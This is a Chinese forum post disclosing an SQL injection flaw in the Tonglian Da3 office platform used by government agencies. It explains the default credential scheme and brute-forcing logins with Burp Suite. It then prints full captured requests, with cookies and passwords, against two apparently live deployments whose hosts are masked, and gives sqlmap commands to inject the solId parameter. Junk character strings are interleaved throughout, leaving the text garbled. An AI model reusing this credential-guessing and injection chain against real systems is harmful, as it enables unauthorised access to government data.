找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1557|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! [% z/ A1 v; \* ^7 s; S F7 d
$ Y( ^! ]; z' j; x5 U4 p( w" v

3 o1 K L( c0 V1 v

" m6 P* k( I8 m! ? p 平台简介:' w& B5 H2 Q& \- m: f

( U B" Z& C; Y

* n5 F) a- f: B m4 |3 {  ) F' X! e' E) }8 s6 M

6 R7 P. v; z, M5 t g) T

5 R2 q0 H0 j7 Y6 \- g 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ [; w4 |% {. Z- J 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
i$ Q+ {( j6 D8 K 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! K$ Q! N* I" k- R

[7 v l6 Y; S

, [ V& d0 l" Q6 |. V: g   $ O+ e% q7 `% ]2 z' @/ X/ z' _, e

' K2 O/ T9 p7 O

; ^# r% r; K- O9 B 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* J P# f+ |+ s4 l5 e. f

( p% B7 C( H% @# Q

' [/ Q7 b7 Z7 j: O( E: {  ! g7 T' M$ ~$ u+ K& i( \; x9 d

3 S5 C. _) \0 @) h' m: k

7 \3 i$ _# K! ~$ b$ [) N! o http://1.1.1.1:7197/cap-aco/#(案例2-)% b% ~9 E6 ~. X* y* h

9 b7 ]. C- w. U! y: J- W* [

$ O6 P9 W4 V4 F8 G$ K: n! C http://www.XXOO.com (案例1-官网网站) ; B: i; O4 H$ J9 W7 j3 j8 X8 t

. @# [2 e7 I' B$ ^7 G: ]& Q& \

5 K' G0 y! E9 n6 {   4 n" d+ I1 _3 h- i9 i

# }1 Q. @8 W$ S' y) e3 ]

% Z4 N/ o* _! x: C V Y) ^ 漏洞详情: # C4 e" t# A1 e2 e2 Y. z) }

2 E5 ~3 e h3 ^

& }6 [1 Y$ O- M$ y2 f# Y% F  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 % C4 Q2 ^4 e) n9 |0 S5 y% R

0 S( d! ]5 x6 S# @$ ]6 H

# X. \8 j$ b: \* T; O" }6 U      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 7 [# C, F8 L2 H" H. ?

3 G/ r% |+ y5 d" t" ^

9 ^! H- U$ I5 z' f  7 J# [0 S: Z6 D- l/ ~' W6 f- ^

, _4 ?6 H/ E' @! A+ ^

0 H6 |+ u- E' h- x9 f   6 Z9 H4 A; V" `" V& F

2 Q7 c0 `9 ^# F+ V2 ~

' `3 d: A2 ` S9 E% j status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:2 }9 y0 @ g4 y# ?4 U4 j( e! m: R

. [/ M8 K2 y; P# g' A2 l6 Q" ^ \

* G( I" k P9 {6 B+ q 1、案例1-官方网站9 S/ p r6 @1 T4 Y/ N' M. Z

6 U; g ?& y$ p5 b

# X, z6 o1 H) R1 [" a% {/ ?, L GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.14 e. s3 F9 {, | L) i9 Y% S

9 i, ?$ \0 L4 c

7 o" A3 Y% i+ @/ u$ F6 U/ ^3 h* k Host: www.XXOO.com9 J y" b3 G2 b. Y7 y

" a- b! J9 h, x, U! X

8 u4 L$ g ?9 Y Proxy-Connection: Keep-Alive8 w( t+ Y( i. T& G* P

/ y. Y3 v( I3 ~

5 [2 K9 n, w: u Accept: application/json, text/javascript, */*; q=0.01 : r) G( i1 D3 A9 Y& M

+ i/ c& U/ M/ Z9 D- c

% i7 t0 ?/ W" r, j# y- e0 c; [ Accept-Language: zh-CN ! x; m: G1 b$ m' A

; B; q4 F+ E- y7 B5 N9 L6 W* Q

9 T" i' C* u+ X1 X Content-Type: application/json ! l }; w. t6 P) U6 U

) C6 S l9 k8 \! |

3 }6 \% d+ [) d8 w" a User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko ; W5 b+ y: W( T, O# S5 e) E

+ h) w5 w5 P* n# ]+ S

9 `8 y3 y% V5 \ X-Requested-With: XMLHttpRequest1 w- Z Z7 B' w* {. c! h/ Z

1 ~/ r+ T. U6 q" T6 D& M* e

9 U! P7 K' J& O: S5 h9 v6 L Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0020 @6 O& \" T: h- w& p0 X. y# B0 ]

, A R, _3 B; }0 U! V" F

! s4 v7 ^& t: p3 @) M Accept-Encoding: gzip, deflate, sdch9 C: h: D$ {' y, d

1 ^" X- w" d' Y3 M

y$ Q! Q' v, D; n3 x* n8 B. h Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e " h" b$ o, [2 Y0 D

5 V, v$ a5 R1 d7 @8 r1 q

6 S5 M! l K) \( j6 X5 l 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:0 c" g+ u# o# g3 j

$ H: h4 D2 j m/ R

" J9 ?" x5 P3 ?! D  8 N5 }$ V1 P) `( Y* d7 [

) B( _ I4 S3 A# Y3 Q$ m9 h' ?6 w

4 }# b3 E+ o% m; A: R  " q v* _9 c+ H1 G* a9 K' Y

. A5 r$ q7 ?6 r( h5 b

, X# u! t8 m3 l# s& M+ D  6 m: x& b N3 L& \1 x6 R% ]) k

0 `! P( b( Z* I

/ |" \; ?0 I* ~2 R7 B3 j, Z  1 b. u1 b+ {0 j) s3 J

! l* x3 I l# q3 E! R0 u* t

" } {9 I5 w' A+ H$ T: W" @) v2 ]  $ d, Z! ~8 }8 V/ d

; n& R* S1 s5 G% J4 b; w6 ]/ @

/ q4 h" o, F9 E$ w" V$ `5 U 2、案例2-某天河云平台7 O- O, R/ _ i# _9 n

- w4 J; X& w, g8 A& [* e* \9 l( O

4 C$ V4 J, L( m: L. s7 K+ M# U+ D GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 + r& I; h; G* |. l' W9 q

- E/ Y4 b9 S! f% R

5 D! N h5 p5 G. E" W Host: 1.1.1.:7197$ E6 P" Z' V9 p4 h. u

( Y: H* i( o0 x4 b% F

( a- B/ ~% w& o" s3 h Accept: application/json, text/javascript, */*; q=0.019 k- s) o9 g5 E) t; t

; b2 M6 u; a5 l2 n) Q6 \

. Z, k& M0 J( z+ S6 u X-Requested-With: XMLHttpRequest$ X9 B4 t" R" [

- P" R+ T1 A0 d- R! v

$ X; Y4 g$ B3 I4 ]) l4 Q \ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0+ A# u4 n' k8 V% _; s0 ?' o

8 J; o. F$ _; h$ i1 M" J; m( w

$ @0 Y) l3 L" b* Y5 |; I4 o: h4 R3 K Content-Type: application/json; c' T. b8 j* s; [ e' z* P# ~

+ k2 `; K, T4 K; @ f' X/ }

5 h. @1 w" t) g# s6 N$ A Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10082 f. a( R& }( {- \/ Z! t: F

& M, ]; W& n; I

( O% K4 `: M5 S- J3 @ Accept-Language: zh-CN,zh;q=0.8 ( c: N: o+ G; v/ L7 d! }$ J

% [$ y/ {) j# @7 i

+ u+ p, |5 K1 e4 S$ c% p Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 2 N+ H3 M& v9 w% s) n

5 y4 \4 Z" ?$ t. p6 \; n z. p

0 F) z$ m0 }3 {3 e2 z2 F" s Connection: close D* a x* u2 a+ E/ p `

& J$ E/ F& Y P$ s& k" }( ]

7 t/ [" T# S' M 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 8 U) O9 ` Z# o% C1 R4 y1 {

a! R- l& H9 E6 F$ x* j8 S

, I$ o4 J. c0 T+ q   : { f- G6 j8 v6 X# x0 S

& c0 W& E, k$ X

5 t% P; Q! X& `. m9 f& R8 Y3 X
4 ?" r" l" n. W

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表